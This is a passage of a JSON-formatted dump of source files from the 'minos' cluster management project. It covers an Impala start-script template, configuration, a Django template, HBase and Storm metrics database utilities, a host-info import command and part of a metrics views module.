"alphanum_fraction": 0.7124125957489014,
"avg_line_length": 21.431371688842773,
"blob_id": "1fe4a72a062a580f836db4600287076a61dd7c6d",
"content_id": "853ad4c9babafdf0668b2707aab8af93cc36aae8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1144,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 51,
"path": "/config/template/impala/start.sh.tmpl",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\nartifact=\"%artifact\"\njob_name=\"%job_name\"\nrun_dir=\"%run_dir\"\nticket_cache=\"%ticket_cache\"\nlog_level=\"%log_level\"\nparams=\"%params\"\n\nrun_dir=`cd \"$run_dir\"; pwd`\n\nstart_time=`date +%%Y%%m%%d-%%H%%M%%S`\n\npackage_dir=\"$run_dir/package\"\noutput_file=\"$run_dir/stdout/${job_name}_${start_time}.out\"\njar_dir=\"$package_dir/jar\"\nlib_dir=\"$package_dir/lib\"\n\njava_home=\"/opt/soft/jdk\"\nos_arch=\"amd64\"\n\n# Set the class path\nclasspath=\"\"\nfor jar in $jar_dir/*.jar; do\n classpath=$classpath:$jar\ndone\nexport CLASSPATH=.:$classpath:$CLASSPATH\n\n# Set the ld library path\nld_library_path=\\\n$LD_LIBRARY_PATH:\\\n$package_dir/lib:\\\n$java_home/jre/lib/$os_arch:\\\n$java_home/jre/lib/$os_arch/server\nexport LD_LIBRARY_PATH=$ld_library_path\n\n# Set hdfs opts\nexport LIBHDFS_OPTS=\"-Djava.security.krb5.conf=/etc/krb5-hadoop.conf -Dimpala.log.dir=$run_dir/log -Dimpala.log.level=$log_level\"\n\n# Set impala home\nexport IMPALA_HOME=$package_dir\n\n# Set the ticket cache\nexport KRB5CCNAME=$ticket_cache\n\n# Set the krb5 config file\nexport KRB5_CONFIG=/etc/krb5-hadoop.conf\n\nulimit -c unlimited\n\nexec $package_dir/bin/${job_name} $params 1>$output_file 2>&1\n"
},
{
"alpha_fraction": 0.7066666483879089,
"alphanum_fraction": 0.7066666483879089,
"avg_line_length": 36.5,
"blob_id": "8af8c684f0378eb881afa588c86c44b37d8c9786",
"content_id": "66e662889ae7ac961c25355d5ca6df238753d919",
"detected_licenses": [
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 75,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 2,
"path": "/supervisor/superlance/tests/__init__.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "def test_suite():\n return unittest.findTestCases(sys.modules[__name__])\n"
},
{
"alpha_fraction": 0.7098121047019958,
"alphanum_fraction": 0.7265135645866394,
"avg_line_length": 25.61111068725586,
"blob_id": "50d5aac68846bac88efdeebb883a67b32c833582",
"content_id": "5deb69596df4bc6c098ec691f3534a285e2a0d64",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 479,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 18,
"path": "/config/owl/owl_config.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "CHART_URL_PREFIX = 'charts'\nTSDB_ADDR = 'http://tsdb_addr:4242'\nSUPERVISOR_PORT = '9001'\n\n# cluster to generate quota report\nQUOTA_REPORT_CLUSTER = ['dptst-example',]\n# user that receive cluster quota report\nQUOTA_REPORT_ADMINS = ''\n# user that receive cluster quota alert\nQUOTA_ALERT_ADMINS = ''\nALLERT_ADMIN_MAIL_ADDR = ''\n\nKERBEROS_IDS_PATH = 'template/kerberos_ids.txt'\n\nALERT_FROM_EMAIL = 'admin'\nROBOT_EMAIL_PASSWORD = ''\nSMTPHOST = 'localhost'\nFAILOVER_TO_EMAIL = 'admin'\n"
},
{
"alpha_fraction": 0.4601971209049225,
"alphanum_fraction": 0.4829416275024414,
"avg_line_length": 41.54838562011719,
"blob_id": "a83881ea32f2cb99ac89929ef1149d8098a53e4b",
"content_id": "c00733b4f9be7a38034f8adc982b2e31390863b8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1319,
"license_type": "permissive",
"max_line_length": 313,
"num_lines": 31,
"path": "/owl/templates/business/online.html",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n{% load extended_filter %}\n\n{% block content %}\n <h3> business={{ business.business}} cluster={{ business.cluster}} </h3>\n\n <div class=\"row\">\n <div id=\"sidebar\" class=\"span1\">\n <ul class=\"nav nav-list affix\">\n <li><a href=\"/business\">back to home</a></li>\n <h6> Online Write </h6>\n {% for menu in write_menus %}\n <li><a href=\"/business/{{business_id}}/{{menu.1}}\">{{menu.0}}</a></li>\n {% endfor %}\n \n <h6> Read HBase </h6>\n {% for menu in read_menus %}\n <li><a href=\"/business/{{business_id}}/{{menu.1}}\">{{menu.0}}</a></li>\n {% endfor %}\n </ul>\n </div>\n\n <div class=\"span11\">\n {% for metric in metrics %}\n <h5 align=\"center\"> {{metric.0}} </h5>\n <iframe frameborder=\"no\" border=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\" allowtransparency=\"yes\" class=\"span11\" style=\"margin:0px;\" height=\"300\" src=\"{{chart_url_prefix}}/charts?zname=perf&big=12&legend_pos=bottom&legend_num=4&hosts={{ metric.2 }}&item_keys={{ metric.1 }}\"></iframe>\n {% endfor %}\n </div>\n </div>\n\n{% endblock %}\n"
},
{
"alpha_fraction": 0.6876287460327148,
"alphanum_fraction": 0.6905229091644287,
"avg_line_length": 33.20469665527344,
"blob_id": "ca792bc31193bbecc209a6507d3e7028a670eba6",
"content_id": "7ee97821ad6b0dcc0956f35508814a626059f6d0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20386,
"license_type": "permissive",
"max_line_length": 281,
"num_lines": 596,
"path": "/owl/monitor/dbutil.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport datetime\nimport hashlib\nimport json\nimport logging\nimport socket\nimport struct\nimport time\n\nimport MySQLdb\nfrom DBUtils.PooledDB import PooledDB\n\nfrom django.conf import settings\nfrom django.utils import timezone\n\nfrom models import Service, Cluster, Quota, Job, Task, Status\nfrom models import Table, RegionServer, HBaseCluster, Region\nfrom models import Counter\nfrom django.db.models import Sum\nimport metric_helper\n\nlogger = logging.getLogger(__name__)\n\ndb_settings = settings.DATABASES['default']\n# we use db connection pool to execute batch update\nDBConnectionPool = PooledDB(MySQLdb, maxusage = 10, mincached = 5,\n db = db_settings['NAME'],\n host = db_settings['HOST'],\n port = int(db_settings['PORT']),\n user = db_settings['USER'],\n passwd = db_settings['PASSWORD'],\n charset = 'utf8')\n\ndef get_services():\n return Service.objects.filter(active=True).all()\n\n\ndef get_service(id):\n try:\n return Service.objects.get(id=id, active=True)\n except Service.DoesNotExist:\n return None\n\n\ndef get_clusters_by_service(service_id=None):\n filters = {\"active\": True}\n if service_id: filters[\"service\"] = service_id\n return Cluster.objects.filter(**filters).all().order_by('service', 'name')\n\n\ndef get_cluster(id):\n try:\n return Cluster.objects.get(id=id, active=True)\n except Cluster.DoesNotExist:\n return None\n\ndef get_hdfs_cluster_by_name(name):\n try:\n hdfs_service_id = Service.objects.get(name='hdfs', active=True).id\n return Cluster.objects.get(service_id=hdfs_service_id, name=name, active=True)\n except Cluster.DoesNotExist:\n return None\n\ndef get_jobs_by_cluster(cluster_id):\n return Job.objects.filter(cluster=cluster_id, active=True).all()\n\n\ndef get_job(id):\n try:\n return Job.objects.get(id=id, active=True)\n except Job.DoesNotExist:\n return None\n\n\ndef get_tasks_by_job(job_id):\n return Task.objects.filter(job=job_id, active=True).all()\n\ndef get_healthy_tasks_by_job(job_id):\n return filter(lambda x: x.health, Task.objects.filter(job=job_id, active=True).all())\n\ndef get_tasks_by_cluster(cluster_id):\n return Task.objects.filter(job__cluster=cluster_id, active=True).order_by('job', 'id')\n\n\ndef get_tasks_by_service(service_id=None):\n filters = {\"active\": True}\n if service_id: filters[\"job__cluster__service\"] = service_id\n return Task.objects.filter(**filters).all()\n\ndef get_tasks_by_service_name(service_name):\n filters = {\n \"active\": True,\n \"job__cluster_service_name\": service_name,\n }\n return Task.objects.filter(**filters).all()\n\ndef get_task_by_host_and_port(host, port):\n try:\n return Task.objects.get(host = host, port = port)\n except:\n host = socket.gethostbyname(host)\n return Task.objects.get(host = host, port = port)\n\n# each cluster only have no more than one storm task\ndef get_storm_task_by_cluster(cluster):\n filters = {\n \"active\": True,\n \"job__name\": \"metricserver\",\n \"job__cluster\": cluster,\n }\n return Task.objects.filter(**filters).all()\n\ndef get_storm_task():\n filters = {\n \"active\": True,\n \"job__name\": \"metricserver\",\n }\n return Task.objects.filter(**filters).all()\n\ndef get_task(id):\n try:\n return Task.objects.get(id=id, active=True)\n except Task.DoesNotExist:\n return None\n\ndef generate_perf_counter_for_task(result):\n tasks = get_alive_tasks()\n for task in tasks:\n if not task.health:\n continue\n result.update(generate_perf_counter(task))\n return result\n\ndef get_alive_tasks():\n return Task.objects.filter(active=True, last_status=Status.OK).all()\n\ndef get_alive_regions_by_rs(rs_record):\n return Region.objects.filter(region_server = rs_record,\n last_attempt_time__gt=region_alive_threshold())\n\ndef region_alive_threshold():\n return datetime.datetime.utcfromtimestamp(time.time() - 60*24).replace(tzinfo=timezone.utc)\n\ndef getTableAvailability(cluster, table):\n group = 'infra-hbase-' + cluster\n name = table + '-Availability'\n try:\n return Counter.objects.get(group=group, name=name,\n last_update_time__gt=counter_alive_threshold()).value\n except Counter.DoesNotExist:\n return -1.0\n\ndef generate_perf_counter(task):\n result = {}\n try:\n last_metrics = json.loads(task.last_metrics)\n except:\n print 'Failed to parse metrics of task:', task\n print task.last_metrics\n return result\n\n endpoint = result.setdefault(metric_helper.form_perf_counter_endpoint_name(task), {})\n for bean_name, bean_metrics in last_metrics.iteritems():\n group_name = metric_helper.form_perf_counter_group_name(task, bean_name)\n group = endpoint.setdefault(group_name, {})\n for metric_name, metric_value in bean_metrics.iteritems():\n metric_type = type(metric_value)\n if not metric_type is int and not metric_type is float:\n continue\n key_name = metric_helper.form_perf_counter_key_name(bean_name, metric_name)\n counter = group.setdefault(key_name, {})\n counter['type'] = 0\n counter['unit'] = ''\n counter['value'] = metric_value\n return result\n\n# map cluster name to endpoint\ndef map_cluster_to_endpoint(cluster_name):\n# ip_int = int(hashlib.md5(cluster_name).hexdigest()[:8], 16)\n# return socket.inet_ntoa(struct.pack(\"!I\", ip_int))\n # perf counter system support non-ip\n return cluster_name\n\n# generate NumOps, AvgTime, MaxTime, MinTime counter for 'group'\ndef generate_perf_counter_of_operation_metrics(record, group):\n if record.operationMetrics is None or record.operationMetrics == '':\n return\n operationMetrics = {}\n try:\n operationMetrics = json.loads(record.operationMetrics)\n except Exception as e:\n logger.warning(\"operationMetrics error: %r for record: %s\", e, record)\n\n for operationName in operationMetrics.keys():\n operation = operationMetrics[operationName]\n # report NumOps\n operationNumOpsName = operationName + '_NumOps'\n counter = group.setdefault(operationNumOpsName, {})\n counter['type'] = 0\n counter['unit'] = 'ops'\n counter['value'] = operation['NumOps']\n # report AvgTime\n operationAvgTimeName = operationName + '_AvgTime'\n counter = group.setdefault(operationAvgTimeName, {})\n counter['type'] = 0\n counter['unit'] = 'us'\n counter['value'] = operation['AvgTime']\n # report MinTime\n operationMinTimeName = operationName + '_MinTime'\n counter = group.setdefault(operationMinTimeName, {})\n counter['type'] = 0\n counter['unit'] = 'us'\n counter['value'] = operation['MinTime']\n # report MaxTime\n operationMaxTimeName = operationName + '_MaxTime'\n counter = group.setdefault(operationMaxTimeName, {})\n counter['type'] = 0\n counter['unit'] = 'us'\n counter['value'] = operation['MaxTime']\n\ndef generate_perf_counter_for_table(result):\n tables = Table.objects.filter(last_attempt_time__gte = alive_time_threshold())\n for table in tables:\n endpoint_name = map_cluster_to_endpoint(table.cluster.name)\n endpoint = result.setdefault(endpoint_name, {})\n group = endpoint.setdefault(str(table), {})\n counter = group.setdefault('readRequestsCountPerSec', {})\n counter['type'] = 0\n counter['unit'] = 'qps'\n counter['value'] = table.readRequestsCountPerSec\n counter = group.setdefault('writeRequestsCountPerSec', {})\n counter['type'] = 0\n counter['unit'] = 'qps'\n counter['value'] = table.writeRequestsCountPerSec\n # report operation perf counter for table\n generate_perf_counter_of_operation_metrics(table, group)\n\n return result\n\ndef generate_perf_counter_for_regionserver(result):\n regionservers = RegionServer.objects.filter(last_attempt_time__gte = alive_time_threshold())\n for regionserver in regionservers:\n endpoint_name = map_cluster_to_endpoint(regionserver.cluster.name)\n endpoint = result.setdefault(endpoint_name, {})\n group = endpoint.setdefault(str(regionserver), {})\n counter = group.setdefault('readRequestsCountPerSec', {})\n counter['type'] = 0\n counter['unit'] = 'qps'\n counter['value'] = regionserver.readRequestsCountPerSec\n counter = group.setdefault('writeRequestsCountPerSec', {})\n counter['type'] = 0\n counter['unit'] = 'qps'\n counter['value'] = regionserver.writeRequestsCountPerSec\n return result\n\ndef generate_perf_counter_for_cluster(result):\n hbase_clusters = HBaseCluster.objects.all()\n for hbase_cluster in hbase_clusters:\n last_update_time = hbase_cluster.cluster.last_attempt_time\n # filter not recently updated cluster\n if last_update_time < alive_time_threshold():\n continue\n endpoint_name = map_cluster_to_endpoint(hbase_cluster.cluster.name)\n endpoint = result.setdefault(endpoint_name, {})\n group = endpoint.setdefault('Cluster', {})\n counter = group.setdefault('readRequestsCountPerSec', {})\n counter['type'] = 0\n counter['unit'] = 'qps'\n counter['value'] = hbase_cluster.readRequestsCountPerSec\n counter = group.setdefault('writeRequestsCountPerSec', {})\n counter['type'] = 0\n counter['unit'] = 'qps'\n counter['value'] = hbase_cluster.writeRequestsCountPerSec\n # report operation perf counter for cluster\n generate_perf_counter_of_operation_metrics(hbase_cluster, group)\n return result\n\ndef is_valid_storm_character(character):\n if character >= '0' and character <= '9':\n return True\n if character >= 'a' and character <= 'z':\n return True\n if character >= 'A' and character <= 'Z':\n return True\n if character == '-' or character == '_' or character == '.' or character == '/':\n return True\n\n return False\n\ndef format_storm_name(name):\n character_list = list(name)\n for character in character_list:\n if not is_valid_storm_character(character):\n name = name.replace(character, '_')\n\n return name\n\ndef generate_perf_counter_for_storm(result):\n storm_tasks = get_storm_task()\n for storm_task in storm_tasks:\n try:\n json_metrics = json.loads(storm_task.last_metrics_raw)\n except:\n logger.warning(\"Failed to parse metrics of task:\", storm_task)\n return result\n\n for storm_id , topology_metrics in json_metrics.iteritems():\n endpoint = result.setdefault(format_storm_name(storm_id), {})\n for group_name, group_metrics in topology_metrics.iteritems():\n if group_name.find(\"STORM_SYSTEM_\") == 0:\n continue\n\n group = endpoint.setdefault(format_storm_name(group_name), {})\n for metrics_name, metrics in group_metrics.iteritems():\n counter = group.setdefault(format_storm_name(metrics_name), {})\n counter['type'] = 0\n counter['unit'] = ''\n counter['value'] = metrics\n\n return result\n\ndef get_all_metrics():\n result = {}\n generate_perf_counter_for_task(result)\n generate_perf_counter_for_table(result)\n generate_perf_counter_for_regionserver(result)\n generate_perf_counter_for_cluster(result)\n generate_perf_counter_for_storm(result)\n return result\n\n\ndef get_or_create_counter(group, name):\n return Counter.objects.get_or_create(group=group, name=name)\n\ndef get_counter(group, name):\n try:\n return Counter.objects.get(group=group, name=name)\n except Counter.DoesNotExist:\n return None\n\ndef counter_alive_threshold():\n return datetime.datetime.utcfromtimestamp(time.time() - 15).replace(tzinfo=timezone.utc)\n\ndef get_counters_by_group(group):\n return Counter.objects.filter(last_update_time__gt=counter_alive_threshold(), group=group).all()\n\ndef get_counters_by_group_and_label(group, label):\n return Counter.objects.filter(group=group, label=label).all()\n\ndef get_all_counters():\n result = {}\n counters = Counter.objects.filter(last_update_time__gt=counter_alive_threshold()).all()\n for counter in counters:\n endpoint = result.setdefault(counter.host, {})\n group = endpoint.setdefault(counter.group, {})\n key = group.setdefault(counter.name, {})\n key['type'] = 0\n key['unit'] = counter.unit\n key['value'] = counter.value\n return result\n\n\ndef get_metric(group, metric):\n try:\n return Metric.objects.get(group=group, metric=metric)\n except Metric.DoesNotExist:\n return None\n\ndef aggregate_metrics(records):\n agg_records = []\n first = None\n for record in records:\n if first is None:\n first = record\n else:\n if (record.time - first.time).seconds < 10:\n first.value += record.value\n else:\n agg_records.append(first)\n first = record\n print len(records), len(agg_records)\n return agg_records\n\n\ndef select_by_step(metrics, step):\n select_metrics = []\n for i in range(0, len(metrics), step):\n select_metrics.append(metrics[i])\n return select_metrics\n\ndef get_table(id):\n try:\n return Table.objects.get(id = id)\n except Table.DoesNotExist:\n return None\n\ndef get_all_tables():\n try:\n return Table.objects.all().filter(last_attempt_time__gte = alive_time_threshold(36000)).order_by('-storefileSizeMB')\n except Table.DoesNotExist:\n return None\n\ndef get_table_by_cluster(cluster):\n return Table.objects.filter(cluster = cluster)\n\n# attr should be 'regionserver' or 'table'\ndef get_items_on_cluster(cluster, attr, order_by):\n # return alive items order by sum of read and write qps\n return getattr(cluster, attr+'_set').filter(last_attempt_time__gte = alive_time_threshold()).\\\n extra(select = {'qps':'readRequestsCountPerSec + writeRequestsCountPerSec'},\n order_by = (order_by, ))\n\ndef get_regionserver(id):\n try:\n return RegionServer.objects.get(id = id)\n except RegionServer.DoesNotExist:\n return None\n\ndef get_quota(id):\n try:\n return Quota.objects.get(id = id)\n except Quota.DoesNotExist:\n return None\n\ndef get_regionservers_with_active_replication_metrics_by_cluster(cluster):\n return RegionServer.objects.filter(cluster = cluster,\n last_attempt_time__gte = alive_time_threshold(),\n replication_last_attempt_time__gte = alive_time_threshold())\n\ndef get_region_by_regionserver_and_encodename(region_server, encodeName):\n try:\n return Region.objects.get(region_server = region_server, encodeName = encodeName)\n except Region.DoesNotExist:\n return None\n\ndef get_region_by_table(tableObj):\n # must use last_attemp_time to filter deleted-regions\n return Region.objects.filter(table = tableObj).filter(last_attempt_time__gte = alive_time_threshold()).all()\n\n# attr should be 'regionserver' or 'table'\ndef get_requests_distribution_groupby(cluster, attr):\n items = getattr(cluster, attr+'_set').filter(last_attempt_time__gte = alive_time_threshold()).all()\n read_requests_dist = {}\n write_requests_dist = {}\n for item in items:\n read_requests_dist[str(item)] = (item.id, item.readRequestsCountPerSec)\n write_requests_dist[str(item)] = (item.id, item.writeRequestsCountPerSec)\n\n return (read_requests_dist, write_requests_dist)\n\ndef get_requests_distribution(owner):\n read_requests_dist = []\n write_requests_dist = []\n for region in owner.region_set.filter(last_attempt_time__gte = alive_time_threshold()).order_by('name'):\n region_id = region.get_region_id()\n read_requests_dist.append((region_id, region.readRequestsCountPerSec))\n write_requests_dist.append((region_id, region.writeRequestsCountPerSec))\n\n return (read_requests_dist, write_requests_dist)\n\ndef get_data_distribution(owner):\n memstore_size_dist = []\n storefile_size_dist = []\n for region in owner.region_set.filter(last_attempt_time__gte = alive_time_threshold()).order_by('name'):\n region_id = region.get_region_id()\n memstore_size_dist.append((region_id, region.memStoreSizeMB))\n storefile_size_dist.append((region_id, region.storefileSizeMB))\n\n return (memstore_size_dist, storefile_size_dist)\n\ndef alive_time_threshold(threshold_in_secs = 120):\n return datetime.datetime.utcfromtimestamp(time.time() - threshold_in_secs).replace(tzinfo=timezone.utc)\n\ndef get_hbase_basic_info(cluster):\n cluster_info = {}\n try:\n hbase_cluster_record = cluster.hbasecluster\n cluster_info['hbase_entry'] = cluster.entry\n\n cluster_info['hdfs_entry'] = get_hdfs_entry(cluster.name)\n cluster_info['zk_entry'] = get_zk_entry(cluster)\n\n cluster_info['read_qps'] = hbase_cluster_record.readRequestsCountPerSec\n cluster_info['write_qps'] = hbase_cluster_record.writeRequestsCountPerSec\n except Exception as e:\n logger.warning(\"Failed to get hbase cluster for cluster %r, %r\", cluster, e)\n\n return cluster_info\n\ndef get_hdfs_entry(cluster_name):\n try:\n service_record = Service.objects.get(name='hdfs')\n hdfs_cluster_record = Cluster.objects.filter(service = service_record,\n name = cluster_name)\n return hdfs_cluster_record[0].entry\n except Exception as e:\n logger.warning(\"Failed to get hdfs entry for cluster %r, %r\", cluster_name, e)\n\n return \"\"\n\n# parse zk address from hbase master's metrics\ndef get_zk_entry(cluster):\n try:\n master_task = cluster.job_set.filter(name='master')[0].task_set.all()\n for task in master_task:\n if not task.health:\n continue\n metric = json.loads(task.last_metrics)\n zk_metrics = metric['hadoop:service=Master,name=Master']['ZookeeperQuorum']\n return zk_metrics\n\n except Exception as e:\n logger.warning(\"Failed to get zk entry for cluster %r: %r\", cluster.name, e)\n return \"\"\n\ndef quota_alive_threshold():\n threshold_in_secs = 60*60*24\n return datetime.datetime.utcfromtimestamp(time.time() - threshold_in_secs).replace(tzinfo=timezone.utc)\n\ndef get_quota_summary(cluster):\n try:\n return cluster.quota_set.filter(last_update_time__gte = quota_alive_threshold()).order_by('name')\n\n except Exception as e:\n logger.warning(\"Failed to get quota for cluster %r: %r\", cluster.name, e)\n return []\n\ndef format_quota_data(quota_item):\n if not quota_item.isdigit():\n return 0\n else:\n return int(quota_item)\n\ndef get_quota_distribution(cluster):\n dirs = get_quota_summary(cluster)\n tsdb_quota_total = {}\n tsdb_space_quota_total = {}\n\n for dir in dirs:\n tsdb_quota_total[dir.name] = ((dir.id, format_quota_data(dir.used_quota)))\n tsdb_space_quota_total[dir.name] = ((dir.id, format_quota_data(dir.used_space_quota)))\n\n return (tsdb_quota_total, tsdb_space_quota_total)\n\ndef update_regions_for_region_server_metrics(regions):\n all_update_metrics = []\n for region in regions:\n update_metrics = []\n update_metrics.append(str(region.last_operation_attempt_time).split('.')[0])\n update_metrics.append(str(region.operationMetrics))\n update_metrics.append(str(region.id))\n all_update_metrics.append(update_metrics)\n\n conn = None\n try:\n conn=DBConnectionPool.connection()\n cur=conn.cursor()\n\n cur.executemany('update monitor_region set last_operation_attempt_time=%s, operationMetrics=%s where id=%s', all_update_metrics)\n conn.commit()\n cur.close()\n except MySQLdb.Error,e:\n print \"Mysql Error %d: %s\" % (e.args[0], e.args[1])\n finally:\n if conn is not None:\n conn.close()\n\ndef update_regions_for_master_metrics(regions):\n all_update_metrics = []\n for region in regions:\n update_metrics = []\n update_metrics.append(str(region.readRequestsCountPerSec))\n update_metrics.append(str(region.writeRequestsCountPerSec))\n update_metrics.append(str(region.last_attempt_time).split('.')[0])\n update_metrics.append(str(region.memStoreSizeMB))\n update_metrics.append(str(region.storefileSizeMB))\n update_metrics.append(str(region.readRequestsCount))\n update_metrics.append(str(region.writeRequestsCount))\n update_metrics.append(str(region.requestsCount))\n update_metrics.append(str(region.region_server.id))\n update_metrics.append(str(region.id))\n all_update_metrics.append(update_metrics)\n\n conn = None\n try:\n conn=DBConnectionPool.connection()\n cur=conn.cursor()\n\n cur.executemany('update monitor_region set readRequestsCountPerSec=%s, writeRequestsCountPerSec=%s, last_attempt_time=%s, memStoreSizeMB=%s, storefileSizeMB=%s, readRequestsCount=%s, writeRequestsCount=%s, requestsCount=%s, region_server_id=%s where id=%s', all_update_metrics)\n conn.commit()\n cur.close()\n except MySQLdb.Error,e:\n print \"Mysql Error %d: %s\" % (e.args[0], e.args[1])\n finally:\n if conn is not None:\n conn.close()\n"
},
{
"alpha_fraction": 0.5521038174629211,
"alphanum_fraction": 0.556822657585144,
"avg_line_length": 26.344085693359375,
"blob_id": "6d7d638ecd217eb3f1fefdbf450ee3612c0119ca",
"content_id": "670c2cdc7c51c0934e122389a644d06ed779a0ad",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2543,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 93,
"path": "/owl/machine/management/commands/import_xman.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import csv\nimport logging\nimport json\nimport sys\nimport urllib2\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\n\nfrom machine.models import Machine\n\n\nlogger = logging.getLogger(__name__)\n\nXMAN_URL = \"http://10.180.2.243/api/hostinfo.php?sql=hostname+=+'%s'\"\nIDC_ABBR = {\n 'shangdi': 'sd',\n 'lugu': 'lg',\n 'lugu6': 'lg',\n 'haihang': 'hh',\n 'wucaicheng': 'dp',\n}\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n changes = []\n for machine in Machine.objects.order_by('hostname'):\n hostname = machine.hostname\n url = XMAN_URL % hostname\n data = json.load(urllib2.urlopen(url))\n xman = {}\n if data and type(data) is dict:\n k, v = data.popitem()\n if v and type(v) is dict:\n try:\n xman = {\n 'ip': v['ipaddr'],\n 'idc': IDC_ABBR[v['site'].lower()],\n 'rack': v['location'].lower(),\n }\n except Exception as e:\n print 'Error on host: %s' % hostname\n raise\n if not xman:\n # the machine doesn't exist in xman, delete it later.\n changes.append((machine, xman, ))\n else:\n # check if any field changed.\n # can't use iteritems as the dict might change.\n for k, v in xman.items():\n if getattr(machine, k) == v:\n del xman[k]\n if xman:\n # some fields changed.\n changes.append((machine, xman, ))\n\n if not changes:\n print 'Nothing updated from xman, exiting.'\n else:\n print 'All changes from xman:'\n for machine, xman in changes:\n self.print_change(machine, xman)\n\n print\n print 'Confirm following changes...'\n answer = None\n for machine, xman in changes:\n self.print_change(machine, xman)\n while answer != 'a':\n answer = raw_input('Apply this or all following change[s]? '\n '<y[es]/n[o]/a[ll]>: ')\n if answer in ['y', 'n', 'a']: break\n if answer == 'n': continue\n # apply change\n self.apply_change(machine, xman)\n\n def print_change(self, machine, xman):\n if not xman:\n action = 'host deleted'\n else:\n action = ', '.join(['%s: %s ==> %s' % (k, getattr(machine, k), v)\n for k, v in xman.iteritems()])\n print '%s: %s' % (machine.hostname, action)\n\n def apply_change(self, machine, xman):\n if not xman:\n machine.delete()\n else:\n for k, v in xman.iteritems():\n setattr(machine, k, v)\n machine.save()\n"
},
{
"alpha_fraction": 0.7076636552810669,
"alphanum_fraction": 0.7083624601364136,
"avg_line_length": 33.34400177001953,
"blob_id": "53cc1322ebed3f87a8bce3746ffe6cfa5fa68aef",
"content_id": "44ad59b74da55345deb9f9dfcb21f357b8e4aaac",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4293,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 125,
"path": "/owl/business/views.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom models import Business\nfrom monitor.views import respond\nfrom monitor.dbutil import get_counters_by_group_and_label\nfrom business_view_config import BUSINESS_METRICS_VIEW_CONFIG\nfrom business_view_config import ONLINE_METRICS_MENU_CONFIG\nfrom business_view_config import ONLINE_METRICS_COUNTER_CONFIG\nfrom business_view_config import ONLINE_METRICS_TITLE_CONFIG\nfrom business_view_config import ONLINE_METRICS_ENDPOINT_CONFIG\n\n#define access type\nACCESS_TYPE_WRITE = 'Write'\nACCESS_TYPE_READ = 'Read'\n#define hbase operation : operation/qps/success_rate\nHBASE_OPERATION_LABEL = 'HBase'\nQPS_LABEL = 'Qps'\nSUCCESS_RATE_LABEL = 'SuccessRate'\n\ndef index(request):\n # show all business\n businesses = Business.objects.all()\n params = {\n 'businesses': businesses,\n }\n return respond(request, 'business/index.html', params)\n\ndef get_latency_counter_name(success_rate_counter_name):\n return success_rate_counter_name.replace('_Qps', '_Latency')\n\ndef get_success_rate_counter_name(success_rate_counter_name):\n return success_rate_counter_name.replace('_Qps', '_SuccessRate')\n\ndef get_counter_name(group, access_type, label):\n label = access_type + \"_\" + label\n counters = get_counters_by_group_and_label(group, label)\n names = []\n print label\n print counters\n for counter in counters:\n names.append(group + \"-\" + counter.name)\n return names\n\ndef get_counter_name_of_hbase_operation(group, access_type):\n label = access_type + \"_\" + QPS_LABEL\n qps_counters = get_counters_by_group_and_label(group, label)\n #order by qps desc\n qps_counters = sorted(qps_counters,cmp=lambda x,y:cmp(y.value,x.value))\n\n #return countrs as : latency, qps and success_rate order by success_rate desc\n counter_names = []\n for qps_counter in qps_counters:\n latency_counter_name = get_latency_counter_name(qps_counter.name)\n success_rate_counter_name = get_success_rate_counter_name(qps_counter.name)\n counter_names.append(group + '-' + qps_counter.name)\n counter_names.append(group + '-' + latency_counter_name)\n counter_names.append(group + '-' + success_rate_counter_name)\n return counter_names\n\ndef get_endpoint(group, access_type):\n endpoint = 'unknown'\n label = access_type + \"_\" + HBASE_OPERATION_LABEL\n counters = get_counters_by_group_and_label(group, label)\n for counter in counters:\n endpoint = counter.host\n endpoint = endpoint.replace(':', '-')\n break\n return endpoint\n\nclass Menu:\n def __init__(self, name, path):\n self.name = name\n self.path = path\n def __unicode__(self):\n return u\"%s/%s\" % (self.name, self.path)\n\n#url: /business/$id/$access_type/$label\ndef show_business(request, id, access_type, label):\n business = Business.objects.get(id=id)\n group = business.getCounterGroup()\n endpoint = get_endpoint(group, access_type)\n metric_names = []\n if label == HBASE_OPERATION_LABEL:\n metric_names = get_counter_name_of_hbase_operation(group, access_type)\n else:\n metric_names = get_counter_name(group, access_type, label)\n\n params = {\n 'business_id' : id,\n 'endpoint': endpoint,\n 'write_menus' : BUSINESS_METRICS_VIEW_CONFIG['Write HBase'],\n 'read_menus' : BUSINESS_METRICS_VIEW_CONFIG['Read HBase'],\n 'metric_names' : metric_names,\n 'business': business,\n }\n return respond(request, 'business/business.html', params)\n\ndef get_online_counters(access_type, label):\n metric_names = ONLINE_METRICS_COUNTER_CONFIG['Online ' + access_type][label]\n titles = ONLINE_METRICS_TITLE_CONFIG['Online ' + access_type][label]\n endpoints = 